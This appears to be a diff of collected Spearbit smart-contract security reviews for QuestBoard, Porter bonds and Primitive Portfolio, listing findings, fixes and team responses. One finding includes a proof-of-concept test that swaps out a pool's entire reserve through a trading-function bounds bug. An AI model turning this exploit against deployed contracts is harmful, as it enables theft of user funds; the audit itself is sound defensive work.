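    return (lastPeriod - currentPeriod) / WEEK;
}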
+5.5.8 Typo in comment
Severity: Informational
Context: QuestBoard.sol#L231
Description: There is a typo in the following comment in the codebase:

* @dev Returns the number of periods to come for a give nQuest

Recommendation: Consider correcting the typo, and review the codebase for similar mistakes to improve code readability.

- * @dev Returns the number of periods to come for a give nQuest
+ * @dev Returns the number of periods to come for a given Quest

Paladin: Implemented in #6.
Spearbit: Acknowledged.

+5.5.9 Require statement with gauge_types function call is redundant
Severity: Informational
Context: QuestBoard.sol#L293
Description: The gauge_types function of Curve reverts when an invalid gauge is given as a parameter, so the "QuestBoard: Invalid Gauge" error message will never be seen in the QuestBoard contract. See the documentation under Querying Gauge and Type Weights.

function createQuest(...) ... {
    ...
    require(IGaugeController(GAUGE_CONTROLLER).gauge_types(gauge) >= 0, "QuestBoard: Invalid Gauge");
    ...
}

Recommendation: Make sure you don't rely on the message "QuestBoard: Invalid Gauge". Consider removing the require statement.
Paladin: In the current state, working with the Curve Gauge Controller, this require is redundant and should never be reached. But it was added in case of future Quest deployments on copies of the Curve Gauge system, where that revert might have been modified or the gauge type customized; there this require would act as expected to prevent creating quests for invalid Gauges (and so that, in case it's removed, it will not be forgotten when needed).
Spearbit: Acknowledged.

+5.5.10 Missing setter function for the GAUGE_CONTROLLER
Severity: Informational
Context: QuestBoard.sol#L31
Description: The GAUGE_CONTROLLER address is immutable and set in the constructor. If Curve adds a new version of the gauge controller, the value of GAUGE_CONTROLLER cannot be updated and the contract QuestBoard needs to be deployed again.

address public immutable GAUGE_CONTROLLER;

constructor(address _gaugeController, address _chest){
    GAUGE_CONTROLLER = _gaugeController;
    ...
}

Recommendation: Consider defining a setter function for the GAUGE_CONTROLLER.
Paladin: In case it does happen, it might be because the Controller system (and then maybe the voting process) would be changed, requiring the deployment of a new version of the QuestBoard. We prefer to re-deploy a new version of Quest in the unlikely case the Gauge Controller is replaced in the Curve ecosystem.
Spearbit: Acknowledged (solution based on redeploy).

+5.5.11 Empty events emitted in killBoard() and unkillBoard() functions
Severity: Informational
Context: QuestBoard.sol#L160-162
Description: When an event is emitted, it stores the arguments passed to it in the transaction logs. Currently the Killed() and Unkilled() events are emitted without any arguments, defeating the purpose of using an event.
Recommendation: Consider using block.timestamp as the argument passed into the Killed() and Unkilled() events, as the value is available in both functions that emit them.

- event Killed();
+ event Killed(uint256 _killedTime);
- event Unkilled();
+ event Unkilled(uint256 _unkilledTime);

Paladin: Implemented in #6.
Spearbit: Acknowledged.
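Note: if a setter were preferred over a redeploy for 5.5.10, a minimal sketch could look as follows (hypothetical; GAUGE_CONTROLLER would have to lose its immutable qualifier, and the function and event names are assumptions):

address public GAUGE_CONTROLLER; // no longer immutable

event GaugeControllerUpdated(address oldController, address newController);

function updateGaugeController(address newController) external onlyOwner {
    require(newController != address(0), "QuestBoard: Zero Address");
    emit GaugeControllerUpdated(GAUGE_CONTROLLER, newController);
    GAUGE_CONTROLLER = newController;
}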
diff --git a/findings_newupdate/spearbit/Porter-Spearbit-Security-Review.txt b/findings_newupdate/spearbit/Porter-Spearbit-Security-Review.txt
new file mode 100644
index 0000000..60944a8
--- /dev/null
+++ b/findings_newupdate/spearbit/Porter-Spearbit-Security-Review.txt
@@ -0,0 +1,11 @@
+5.1.1 Freeze Redeems if bonds too Large
Severity: Medium Risk
Context: Bond.sol#L309
Description: Issuing too many bonds can result in users being unable to redeem. This is caused by arithmetic overflow in previewRedeemAtMaturity. If the product of a user's bonds and paidAmount (or bonds * nonPaidAmount) is greater than 2**256, it will overflow, reverting all attempts to redeem bonds.
Recommendation: Implement a safety check in the factory as follows:

uint256 _safetyCheck_ = bonds * bonds;

Or inside the initialize function:

uint256 _safetyCheck_ = maxSupply * maxSupply;

Or change bonds in factory/Bond.initialize to a type of uint128. This ensures that bonds.mulDivDown(paidAmount, bondSupply) is always computable without overflow, as paidAmount is at most maxSupply (set during initialize) and bonds is at most maxSupply (set during initialize). bonds * bonds passing the safety check ensures redeems remain functional.
Porter: Implemented in PR #290.
Spearbit: Acknowledged, recommendation has been implemented.

+5.1.2 Reentrancy in withdrawExcessCollateral() and withdrawExcessPayment() functions
Severity: Medium Risk
Context: Bond.sol#L212, Bond.sol#L233
Description: withdrawExcessCollateral() and withdrawExcessPayment() enable the caller to withdraw excess collateral and payment tokens respectively. Both functions are guarded by an onlyOwner modifier, limiting their access to the owner of the contract.

function withdrawExcessCollateral(uint256 amount, address receiver) external onlyOwner
function withdrawExcessPayment(address receiver) external onlyOwner

When transferring tokens, execution flow is handed over to the token contract. Therefore, if a malicious token manages to call the owner's address, it can also call these functions again to withdraw more tokens than intended. As an example, consider the following case where the collateral token's transferFrom() function calls the owner's address:
• Any restriction to the burnFrom(address account, uint256 amount) function which has to be considered in context with the refinancing plan. Porter: Due to low risk attack vector and additional complexity, we’ve decided to not restrict burn() and burn- From() functions. Spearbit: Acknowledged, recommendations have not been implemented. 5 +5.2.2 Missing two-step transfer ownership pattern Severity: Low Risk Context: Bond.sol#L28 Description: After a bond is created its ownership is transferred to the wallet which invoked the createBond function, but it can be later transferred to anyone at any time or the renounceOwnership function can be called. The Bond contract uses the Ownable Openzeppelin contract, which is a simple mechanism to transfer ownership without supporting a two-step ownership transfer pattern. OpenZeppelin describes Ownable as: Ownable is a simpler mechanism with a single owner "role" that can be assigned to a single account. This simpler mechanism can be useful for quick tests but projects with production concerns are likely to outgrow it. Ownership transfer is a critical operation and transferring it to an inaccessible wallet or renouncing ownership by mistake can effectively lock the collateral in the contract forever. Recommendation: It is recommended to implement a two-step transfer ownership mechanism where ownership is transferred and later claimed by a new owner to confirm the whole process and prevent a lockout. Because the OpenZeppelin ecosystem does not provide such implementation it has to be developed in-house. For inspiration BoringOwnable can be considered. However, it has to be well tested especially in case it is integrated with other OpenZeppelin contracts used by the project. Porter: Confirms and accepts the risks. The team will consider two-step ownership transfer for future contracts. Spearbit: Acknowledged. +5.2.3 Inefficient initialization of minimal proxy implementation Severity: Low Risk Context: BondFactory.sol#L71, deploy_bond_factory.ts#L24 Description: The Bond contract uses a minimal proxy pattern when deployed by BondFactory. The proxy pattern requires a special initialize method to be called to set the state of each cloned contract. Nevertheless, the implementation contract can be left uninitialized, giving an attacker the opportunity to invoke the initialization. constructor() { tokenImplementation = address(new Bond()); _grantRole(DEFAULT_ADMIN_ROLE, _msgSender()); } After the reporting the issue it was discovered that a separate (not merged) development branch implements a deployment script which initializes the Bond implementation contract after the main deployment of BondFactory, leaving a narrow window for the attacker to leverage this issue and reducing impact significantly. 
deploy_bond_factory.ts#L24 6 const implementationContract = (await ethers.getContractAt( "Bond", await factory.tokenImplementation() )) as Bond; try { await waitUntilMined( await implementationContract.initialize( "Placeholder Bond", "BOND", deployer, THREE_YEARS_FROM_NOW_IN_SECONDS, "0x0000000000000000000000000000000000000000", "0x0000000000000000000000000000000000000001", ethers.BigNumber.from(0), ethers.BigNumber.from(0), 0 ) ); } catch (e) { console.log("Is the contract already initialized?"); console.log(e); } Due to the fact that the initially reviewed code did not have the proper initialization for the Bond implementation (as it was an unmerged branch) and because in case of a successful exploitation the impact on the system remains minimal, this finding is marked as low risk. It is not necessary to create a separate transaction and initialize the storage of the implementation contract to prevent unauthorized initialization. Recommendation: OpenZeppelin’s minimal proxy pattern implements a more efficient (less gas) and elegant way to lock the implementation contract by simply invoking _disableInitializers(), thus this solution is recom- mended instead of the current mechanism. Porter: Implemented in PR #262. Spearbit: Acknowledged, recommendation has been implemented. 5.3 Gas Optimization +5.3.1 Verify amount is greater than 0 to avoid unnecessarily safeTransfer() calls Severity: Gas Optimization Context: Bond.sol#L263 Description: Balance should be checked to avoid unnecessary safeTransfer() calls with an amount of 0. Recommendation: Implement a check to make sure amount > 0 to avoid unnecessary safeTransfer() calls. + + + uint256 sweepingTokenBalance = sweepingToken.balanceOf(address(this)); if (sweepingTokenBalance == 0) { revert ZeroAmount(); } sweepingToken.safeTransfer(receiver, sweepingTokenBalance); Porter: Implemented in PR #287. Spearbit: Acknowledged, recommendation has been implemented. 7 5.4 Informational +5.4.1 Improve checks for token allow-list Severity: Informational Context: BondFactory.sol#L93 Description: The BondFactory contract has two enabled allow-lists by default, which require the team’s approval for issuers and tokens to create bonds. However, the screening process was not properly defined before the assessment. In case a malicious token and issuer slip through the screening process the protocol can be used by malicious actors to perform mass scam attacks. In such scenario, tokens and issuers would be able to create bonds, sell those anywhere and later on exploit those tokens, leading to loss of user funds. /// @inheritdoc IBondFactory function createBond( string memory name, string memory symbol, uint256 maturity, address paymentToken, address collateralToken, uint256 collateralTokenAmount, uint256 convertibleTokenAmount, uint256 bonds ) external onlyIssuer returns (address clone) Recommendation: Consider • Ensuring that all tokens are checked and passed through checklist. • Use automation and scripts to cover this checklist as thoroughly as possible in form of e.g. a report. • Add logic to support inclusion/exclusion of such tokens or document the non-support warning explicitly to users. Porter: Since The Team has a checklist for tokens that can be used as a payment or collateral token, this safeguard should act to prevent malicious type of token. Spearbit: Acknowledged (solution based on procedures, not technical). 
+5.4.2 Incorrect revert message Severity: Informational Context: Bond#L81, IBond.sol#14 Description: error BondBeforeGracePeriodOrPaid() is used to revert when !isAfterGracePeriod() && amountPaid() > 0, which means the bonds is before the grace period and not paid for. Therefore, the error description is incorrect. if (isAfterGracePeriod() || amountUnpaid() == 0) { _; } else { revert BondBeforeGracePeriodOrPaid(); } Recommendation: Consider changing this error name to BondBeforeGracePeriodAndNotPaid(), and also cor- rect the related Natspec description. Porter: Implemented in PR #282. Spearbit: Solution is implemented. 8 +5.4.3 Non-existent bonds naming/symbol restrictions Severity: Informational Context: BondFactory.sol#L93 Description: The issuer can define any name and symbol during bond creation. Naming is neither enforced nor constructed by the contract and may result in abusive or misleading names which could have a negative impact on the PR of the project. /// @inheritdoc IBondFactory function createBond( string memory name, string memory symbol, uint256 maturity, address paymentToken, address collateralToken, uint256 collateralTokenAmount, uint256 convertibleTokenAmount, uint256 bonds ) external onlyIssuer returns (address clone) A malicious user could hypothetically use arbitrary names to: • Mislead users into thinking they are buying bonds consisting of different tokens. • Use abusive names to discredit the team. • Attempt to exploit the frontend application by injecting arbitrary HTML data. The team had a discussion regarding naming conventions in the past. However, not all the abovementioned scenarios were brought up during that conversation. Therefore, this finding is reported as informational to revisit and estimate its potential impact, or add it as a test case during the web application implementation. Recommendation: Consider revisiting the design decision regarding arbitrary names and symbols supplied by end-users in the context of the previously described risks. Especially important is the latest scenario regard- ing potential HTML injection, which has to be taken into consideration and properly mitigated in web application implementations. It is recommended to decide on naming conventions and enforce them programmatically, ideally at the smart contract level as any implementation in the UI can be easily bypassed. Porter: The team understands the risks and potential abuses and will consider it in discussions regarding naming formats. Verified it does not impact on the front-end. Spearbit: Acknowledged. +5.4.4 Needles variable initialization for default values Severity: Informational Context: Bond.sol#L333 Description: uint256 variable are initialized to a default value of zero per Solidity docs. Setting a variable to the default value is unnecessary. Recommendation: Remove explicit initialization for default values. Porter: Implemented in PR #283. Spearbit: Acknowledged, solution has been implemented. 9 +5.4.5 Deflationary payment tokens are not handled in the pay() function Severity: Informational Context: Bond.sol#L145 Description: The pay() function does not support rebasing/deflationary/inflationary payment tokens whose balance changes during transfers or over time. The necessary checks include at least verifying the amount of tokens transferred to contracts before and after the actual transfer to infer any fees/interest. 
Recommendation: Consider comparing the contract's balance before and after the transfer and using the difference as the received amount, to handle any rebasing/inflationary/deflationary payment tokens. + uint balanceBefore = IERC20Metadata(paymentToken).balanceOf(address(this)); IERC20Metadata(paymentToken).safeTransferFrom( msg.sender, address(this), amount ); + uint balanceAfter = IERC20Metadata(paymentToken).balanceOf(address(this)); + uint amountDiff = balanceAfter - balanceBefore; + emit Payment(msg.sender, amountDiff); Porter: Implemented in PR #285. Spearbit: Acknowledged, solution has been implemented. 6 Additional Comments Additionally to the audit report, a full Foundry-based fuzzing and CI setup was provided after the assessment to improve the security posture of the project. diff --git a/findings_newupdate/spearbit/Primitive-Spearbit-Security-Review-July.txt b/findings_newupdate/spearbit/Primitive-Spearbit-Security-Review-July.txt new file mode 100644 index 0000000..b5f4fdc --- /dev/null +++ b/findings_newupdate/spearbit/Primitive-Spearbit-Security-Review-July.txt @@ -0,0 +1,13 @@ +5.1.1 tradingFunction returns wrong invariant at bounds, allowing to steal all pool reserves Severity: Critical Risk Context: NormalStrategyLib.sol#L157-L165 Description: The tradingFunction computing the invariant value of k = Φ⁻¹(y/K) - Φ⁻¹(1-x) + σ√τ returns the wrong value at the bounds of x and y. The bounds of x are 0 and 1e18; the bounds of y are 0 and K, the strike price. If x or y is at these bounds, the corresponding term's computation is skipped and therefore implicitly set to 0, its initialization value. int256 invariantTermX; // Φ⁻¹(1-x) // @audit if x is at the bounds, the term remains 0 if (self.reserveXPerWad.isBetween(lowerBoundX + 1, upperBoundX - 1)) { invariantTermX = Gaussian.ppf(int256(WAD - self.reserveXPerWad)); } int256 invariantTermY; // Φ⁻¹(y/K) // @audit if y is at the bounds, the term remains 0 if (self.reserveYPerWad.isBetween(lowerBoundY + 1, upperBoundY - 1)) { invariantTermY = Gaussian.ppf( int256(self.reserveYPerWad.divWadUp(self.strikePriceWad)) ); } Note that Φ⁻¹ = Gaussian.ppf is the probit function, which is undefined at 0 and 1.0 but tends towards -infinity at 0 and +infinity at 1.0 = 1e18. (The closest values used in the Solidity approximation are Gaussian.ppf(1) = -8710427241990476442 ~ -8.71 and Gaussian.ppf(1e18-1) = 8710427241990476442 ~ 8.71.) This fact can be abused by an attacker to steal the pool reserves. For example, the y-term Φ⁻¹(y/K) will be a negative value for y/K < 0.5. Trading out the entire y reserve will compute the new invariant with y set to 0, and the y-term Φ⁻¹(y/K) = Φ⁻¹(0) = -infinity is set to 0 instead, increasing the overall invariant and accepting the swap.
// SPDX-License-Identifier: GPL-3.0-only pragma solidity ^0.8.4; import "solmate/utils/SafeCastLib.sol"; import "./Setup.sol"; contract TestSpearbit is Setup { using SafeCastLib for uint256; using AssemblyLib for uint256; using AssemblyLib for uint128; using FixedPointMathLib for uint256; using FixedPointMathLib for uint128; function test_swap_all_out() public defaultConfig useActor usePairTokens(10 ether) allocateSome(1 ether) { (uint256 reserveAsset, uint256 reserveQuote) = subject().getPoolReserves(ghost().poolId); bool sellAsset = true; uint128 amtIn = 2; // pass reserve-not-stale check after taking fee uint128 amtOut = uint128(reserveQuote); uint256 prev = ghost().quote().to_token().balanceOf(actor()); Order memory order = Order({ useMax: false, poolId: ghost().poolId, input: amtIn, output: amtOut, sellAsset: sellAsset }); subject().swap(order); uint256 post = ghost().quote().to_token().balanceOf(actor()); assertTrue(post > prev, "swap-failed"); } } Recommendation: The terms for values at the bounds, Φ⁻¹(y/K) and Φ⁻¹(1-x), may not be set to zero, as they would mathematically correspond to +/- infinity, resulting in a wrong invariant value. Swapping out all reserves should not be possible. As there are several other problems with one reserve value being zero, we recommend disallowing swapping out all reserves. Note that deallocating should already not allow zeroing a reserve, as some initial LP tokens are locked and the deallocated amounts are rounded down. Primitive: Fixed in commit 743829. • Checks if either reserve is gte a respective bound. If it is, set it as close to the bound as possible, but not at the bound, so the Gaussian.ppf function does not revert. • If one of the reserves is set very close to its bound, the other reserve will need to be very close to its opposite bound, else the invariant will be very negative. • Adds a check in adjustReserves, which gets triggered during a swap, to revert if either virtualX or virtualY are zero. • Removes the overwritten deltaLiquidity value that would allow 0 allocates to happen in getPoolMaxLiquidity. • Also note that I updated the 'min delta' value in the invariant tests. It looks like if either of the reserves are changed by >= 3 wei then the trading function is strictly monotonic. If the delta is 2 or less, there are some cases where the invariant does not change. Spearbit: Fixed. 5.2 Medium Risk +5.2.1 getSpotPrice, approximateReservesGivenPrice, getStrategyData ignore time to maturity Severity: Medium Risk Context: NormalStrategyLib.sol#L375 Description: When calling getSpotPrice, getStrategyData or approximateReservesGivenPrice, the pool config is transformed into a NormalCurve struct. This transformation always sets the time to maturity field to the entire duration: function transform(PortfolioConfig memory config) pure returns (NormalCurve memory) { return NormalCurve({ reserveXPerWad: 0, reserveYPerWad: 0, strikePriceWad: config.strikePriceWad, standardDeviationWad: config.volatilityBasisPoints.bpsToPercentWad(), timeRemainingSeconds: config.durationSeconds, invariant: 0 }); } Nor is the curve.timeRemainingSeconds value overridden with the correct value in the mentioned functions. The reported spot price will be wrong after the pool has been initialized, and integrators cannot rely on this value. Recommendation: Initialize the timeRemainingSeconds value in transform to the current time remaining, or set it to the correct value afterwards for the functions where it is needed. It should use a value similar to what computeTau(..., block.timestamp) returns. Consider adding additional tests for the affected functions for pools that have been active for a while.
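A minimal diff-style sketch of the recommended change, assuming a computeTau-like helper is available to transform that returns the seconds until maturity (clamped to 0 once expired); the exact helper signature in the codebase may differ:

function transform(PortfolioConfig memory config) view returns (NormalCurve memory) {
    return NormalCurve({
        reserveXPerWad: 0,
        reserveYPerWad: 0,
        strikePriceWad: config.strikePriceWad,
        standardDeviationWad: config.volatilityBasisPoints.bpsToPercentWad(),
-       timeRemainingSeconds: config.durationSeconds,
+       // assumption: computeTau returns seconds until maturity, 0 once expired
+       timeRemainingSeconds: computeTau(config, block.timestamp),
        invariant: 0
    });
}

Note that reading block.timestamp means transform can no longer be pure, which is why the mutability is relaxed to view in this sketch.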
Primitive: Fixed in commit 15ee0f. Spearbit: Fixed. It was changed for getSpotPrice; comments have been added to the other functions. 5.3 Low Risk +5.3.1 Numerical error on larger trades favors the swapper relative to mathematically ideal pricing Severity: Low Risk Context: File.sol#L123 Description: To test the accuracy of the Solidity numerical methods used, a Python implementation of the swap logic was created using a library that supports arbitrary precision (https://mpmath.org/). Solidity swap executions generated in a custom fuzz test were compared against arbitrary precision results using Foundry's ffi feature (https://book.getfoundry.sh/forge/differential-ffi-testing). Cases where the "realized" swap price was better for the swapper than the "ideal" swap price were flagged. Deviations in the swapper's favor as large as 25% were observed (and larger ones likely exist). These seem to be a function of the size of the swap made: larger swaps favor the swapper more than smaller swaps (in fact, deviations were observed to trend towards zero as swap size relative to pool size decreased). It is unclear if there is any problem in practice from this behavior: large swaps will still incur large slippage and are only incentivized when the price has "jumped" drastically; fees also help make up for losses. Without going further, it can be stated that there is a risk for pools with frequent discontinuous price changes to track the theoretical payoff more poorly, but further numerical investigations are needed to determine whether there is a serious concern. The test cases below require the simulation repo to be cloned into a Python virtual environment in a directory named primitive-math-venv, with the needed dependencies, at the same directory hierarchy level as the portfolio repository. That is, the portfolio/ directory and the primitive-math-venv/ directory should be in the same folder, and the primitive-math-venv/ folder should contain the primitive-sim repository. The virtual environment needs to be activated and have the mpmath, scipy, numpy, and eth_abi dependencies installed via pip or another method. Alternatively, these can be installed globally, in which case the primitive-math-venv directory does not need to be a virtual environment.
// SPDX-License-Identifier: GPL-3.0-only pragma solidity ^0.8.4; import "solmate/utils/SafeCastLib.sol"; import "./Setup.sol"; contract TestNumericalDeviation is Setup { using SafeCastLib for uint256; using AssemblyLib for uint256; using AssemblyLib for uint128; using FixedPointMathLib for uint256; using FixedPointMathLib for uint128; bool printLogs = true; function _fuzz_random_args( bool sellAsset, uint256 amountIn, uint256 amountOut ) internal returns (bool swapExecuted) { Order memory maxOrder = subject().getMaxOrder(ghost().poolId, sellAsset, actor()); amountIn = bound(amountIn, maxOrder.input / 1000 + 1, maxOrder.input); amountOut = subject().getAmountOut(ghost().poolId, sellAsset, amountIn, actor()); if (printLogs) console.log("amountOut: ", amountOut); Order memory order = Order({ useMax: false, poolId: ghost().poolId, input: amountIn.safeCastTo128(), output: amountOut.safeCastTo128(), sellAsset: sellAsset }); try subject().simulateSwap({ order: order, timestamp: block.timestamp, swapper: actor() }) returns (bool swapSuccess, int256 prev, int256 post) { try subject().swap(order) { assertTrue( swapSuccess, "simulateSwap-failed but swap succeeded" ); assertTrue(post >= prev, "post-invariant-not-gte-prev"); swapExecuted = true; } catch { assertTrue( !swapSuccess, "simulateSwap-succeeded but swap failed" ); } } catch { // pass this case } } struct TestVals { uint256 strike; uint256 volatility_bps; uint256 durationSeconds; uint256 ttm; } // fuzzing entrypoint used to find violating swaps function test_swap_deviation(uint256 amtIn, uint256 amtOut) public defaultConfig useActor usePairTokens(10 ether) allocateSome(1 ether) { PortfolioPool memory pool = ghost().pool(); (uint256 preXPerL, uint256 preYPerL) = (pool.virtualX, pool.virtualY); if (printLogs) { console.log("x_start: ", preXPerL); console.log("y_start: ", preYPerL); } TestVals memory tv; { uint256 creationTimestamp; (tv.strike, tv.volatility_bps, tv.durationSeconds, creationTimestamp,) = NormalStrategy(pool.strategy).configs(ghost().poolId); tv.ttm = creationTimestamp + tv.durationSeconds - block.timestamp; if (printLogs) { console.log("strike: ", tv.strike); console.log("volatility_bps: ", tv.volatility_bps); console.log("durationSeconds: ", tv.durationSeconds); console.log("creationTimestamp: ", creationTimestamp); console.log("block.timestamp: ", block.timestamp); console.log("ttm: ", tv.ttm); console.log("protocol fee: ", subject().protocolFee()); console.log("pool fee: ", pool.feeBasisPoints); console.log("pool priority fee: ", pool.priorityFeeBasisPoints); } } bool sellAsset = true; if (printLogs) console.log("sellAsset: ", sellAsset); { bool swapExecuted = _fuzz_random_args(sellAsset, amtIn, amtOut); if (!swapExecuted) return; // not interesting to check swap if it didn't execute } pool = ghost().pool(); (uint256 postXPerL, uint256 postYPerL) = (pool.virtualX, pool.virtualY); if (printLogs) { console.log("x_end: ", postXPerL); console.log("y_end: ", postYPerL); } string[] memory cmds = new string[](18); cmds[0] = "python3"; cmds[1] = "../primitive-math-venv/primitive-sim/check_swap_result.py"; cmds[2] = "--x"; cmds[3] = vm.toString(preXPerL); cmds[4] = "--y"; cmds[5] = vm.toString(preYPerL); cmds[6] = "--strike"; cmds[7] = vm.toString(tv.strike); cmds[8] = "--vol_bps"; cmds[9] = vm.toString(tv.volatility_bps); cmds[10] = "--duration"; cmds[11] = vm.toString(tv.durationSeconds); cmds[12] = "--ttm"; cmds[13] = vm.toString(tv.ttm); cmds[14] = "--xprime"; cmds[15] = vm.toString(postXPerL); cmds[16] = "--yprime"; cmds[17] = vm.toString(postYPerL);
bytes memory result = vm.ffi(cmds); (uint256 idealFinalDependentPerL) = abi.decode(result, (uint256)); if (printLogs) console.log("idealFinalDependentPerL: ", idealFinalDependentPerL); uint256 postDependentPerL = sellAsset ? postYPerL : postXPerL; // Only worried if swap was _better_ than ideal if (idealFinalDependentPerL > postDependentPerL) { uint256 diff = idealFinalDependentPerL - postDependentPerL; uint256 percentErrWad = diff * 1e18 / idealFinalDependentPerL; if (printLogs) console.log("%% err wad: ", percentErrWad); // assert at worst 25% error assertLt(percentErrWad, 0.25 * 1e18); } } function test_swap_gt_2pct_dev_in_swapper_favor() public defaultConfig useActor usePairTokens(10 ether) allocateSome(1 ether) { uint256 amtIn = 6552423086988641261559668799172253742131420409793952225706522955; uint256 amtOut = 0; PortfolioPool memory pool = ghost().pool(); (uint256 preXPerL, uint256 preYPerL) = (pool.virtualX, pool.virtualY); if (printLogs) { console.log("x_start: ", preXPerL); console.log("y_start: ", preYPerL); } TestVals memory tv; { uint256 creationTimestamp; (tv.strike, tv.volatility_bps, tv.durationSeconds, creationTimestamp,) = NormalStrategy(pool.strategy).configs(ghost().poolId); tv.ttm = creationTimestamp + tv.durationSeconds - block.timestamp; if (printLogs) { console.log("strike: ", tv.strike); console.log("volatility_bps: ", tv.volatility_bps); console.log("durationSeconds: ", tv.durationSeconds); console.log("creationTimestamp: ", creationTimestamp); console.log("block.timestamp: ", block.timestamp); console.log("ttm: ", tv.ttm); console.log("protocol fee: ", subject().protocolFee()); console.log("pool fee: ", pool.feeBasisPoints); console.log("pool priority fee: ", pool.priorityFeeBasisPoints); } } bool sellAsset = true; if (printLogs) console.log("sellAsset: ", sellAsset); { bool swapExecuted = _fuzz_random_args(sellAsset, amtIn, amtOut); if (!swapExecuted) return; // not interesting to check swap if it didn't execute } pool = ghost().pool(); (uint256 postXPerL, uint256 postYPerL) = (pool.virtualX, pool.virtualY); if (printLogs) { console.log("x_end: ", postXPerL); console.log("y_end: ", postYPerL); } string[] memory cmds = new string[](18); cmds[0] = "python3"; cmds[1] = "../primitive-math-venv/primitive-sim/check_swap_result.py"; cmds[2] = "--x"; cmds[3] = vm.toString(preXPerL); cmds[4] = "--y"; cmds[5] = vm.toString(preYPerL); cmds[6] = "--strike"; cmds[7] = vm.toString(tv.strike); cmds[8] = "--vol_bps"; cmds[9] = vm.toString(tv.volatility_bps); cmds[10] = "--duration"; cmds[11] = vm.toString(tv.durationSeconds); cmds[12] = "--ttm"; cmds[13] = vm.toString(tv.ttm); cmds[14] = "--xprime"; cmds[15] = vm.toString(postXPerL); cmds[16] = "--yprime"; cmds[17] = vm.toString(postYPerL); bytes memory result = vm.ffi(cmds); (uint256 idealFinalYPerL) = abi.decode(result, (uint256)); if (printLogs) console.log("idealFinalYPerL: ", idealFinalYPerL); // Only worried if swap was _better_ than ideal if (idealFinalYPerL > postYPerL) { uint256 diff = idealFinalYPerL - postYPerL; uint256 percentErrWad = diff * 1e18 / idealFinalYPerL; if (printLogs) console.log("%% err wad: ", percentErrWad); // assert at worst 2% error assertLt(percentErrWad, 0.02 * 1e18); } } function test_swap_gt_5pct_dev_in_swapper_favor() public defaultConfig useActor usePairTokens(10 ether) allocateSome(1 ether) { uint256 amtIn = 524204019310836059902749478707356665714276202503631350973429403; uint256 amtOut = 0; PortfolioPool memory pool = ghost().pool(); (uint256 preXPerL, uint256 preYPerL) = (pool.virtualX, pool.virtualY);
if (printLogs) { console.log("x_start: ", preXPerL); console.log("y_start: ", preYPerL); } TestVals memory tv; { uint256 creationTimestamp; (tv.strike, tv.volatility_bps, tv.durationSeconds, creationTimestamp,) = NormalStrategy(pool.strategy).configs(ghost().poolId); tv.ttm = creationTimestamp + tv.durationSeconds - block.timestamp; if (printLogs) { console.log("strike: ", tv.strike); console.log("volatility_bps: ", tv.volatility_bps); console.log("durationSeconds: ", tv.durationSeconds); console.log("creationTimestamp: ", creationTimestamp); console.log("block.timestamp: ", block.timestamp); console.log("ttm: ", tv.ttm); console.log("protocol fee: ", subject().protocolFee()); console.log("pool fee: ", pool.feeBasisPoints); console.log("pool priority fee: ", pool.priorityFeeBasisPoints); } } bool sellAsset = true; if (printLogs) console.log("sellAsset: ", sellAsset); { bool swapExecuted = _fuzz_random_args(sellAsset, amtIn, amtOut); if (!swapExecuted) return; // not interesting to check swap if it didn't execute } pool = ghost().pool(); (uint256 postXPerL, uint256 postYPerL) = (pool.virtualX, pool.virtualY); if (printLogs) { console.log("x_end: ", postXPerL); console.log("y_end: ", postYPerL); } string[] memory cmds = new string[](18); cmds[0] = "python3"; cmds[1] = "../primitive-math-venv/primitive-sim/check_swap_result.py"; cmds[2] = "--x"; cmds[3] = vm.toString(preXPerL); cmds[4] = "--y"; cmds[5] = vm.toString(preYPerL); cmds[6] = "--strike"; cmds[7] = vm.toString(tv.strike); cmds[8] = "--vol_bps"; cmds[9] = vm.toString(tv.volatility_bps); cmds[10] = "--duration"; cmds[11] = vm.toString(tv.durationSeconds); cmds[12] = "--ttm"; cmds[13] = vm.toString(tv.ttm); cmds[14] = "--xprime"; cmds[15] = vm.toString(postXPerL); cmds[16] = "--yprime"; cmds[17] = vm.toString(postYPerL); bytes memory result = vm.ffi(cmds); (uint256 idealFinalYPerL) = abi.decode(result, (uint256)); if (printLogs) console.log("idealFinalYPerL: ", idealFinalYPerL); // Only worried if swap was _better_ than ideal if (idealFinalYPerL > postYPerL) { uint256 diff = idealFinalYPerL - postYPerL; uint256 percentErrWad = diff * 1e18 / idealFinalYPerL; if (printLogs) console.log("%% err wad: ", percentErrWad); // assert at worst 5% error assertLt(percentErrWad, 0.05 * 1e18); } } function test_swap_gt_25pct_dev_in_swapper_favor() public defaultConfig useActor usePairTokens(10 ether) allocateSome(1 ether) { uint256 amtIn = 110109023928019935126448015360767432374367360662791991077231763772041488708545; uint256 amtOut = 0; PortfolioPool memory pool = ghost().pool(); (uint256 preXPerL, uint256 preYPerL) = (pool.virtualX, pool.virtualY); if (printLogs) { console.log("x_start: ", preXPerL); console.log("y_start: ", preYPerL); } TestVals memory tv; { uint256 creationTimestamp; (tv.strike, tv.volatility_bps, tv.durationSeconds, creationTimestamp,) = NormalStrategy(pool.strategy).configs(ghost().poolId); tv.ttm = creationTimestamp + tv.durationSeconds - block.timestamp; if (printLogs) { console.log("strike: ", tv.strike); console.log("volatility_bps: ", tv.volatility_bps); console.log("durationSeconds: ", tv.durationSeconds); console.log("creationTimestamp: ", creationTimestamp); console.log("block.timestamp: ", block.timestamp); console.log("ttm: ", tv.ttm); console.log("protocol fee: ", subject().protocolFee()); console.log("pool fee: ", pool.feeBasisPoints); console.log("pool priority fee: ", pool.priorityFeeBasisPoints); } } bool sellAsset = true; if (printLogs) console.log("sellAsset: ", sellAsset);
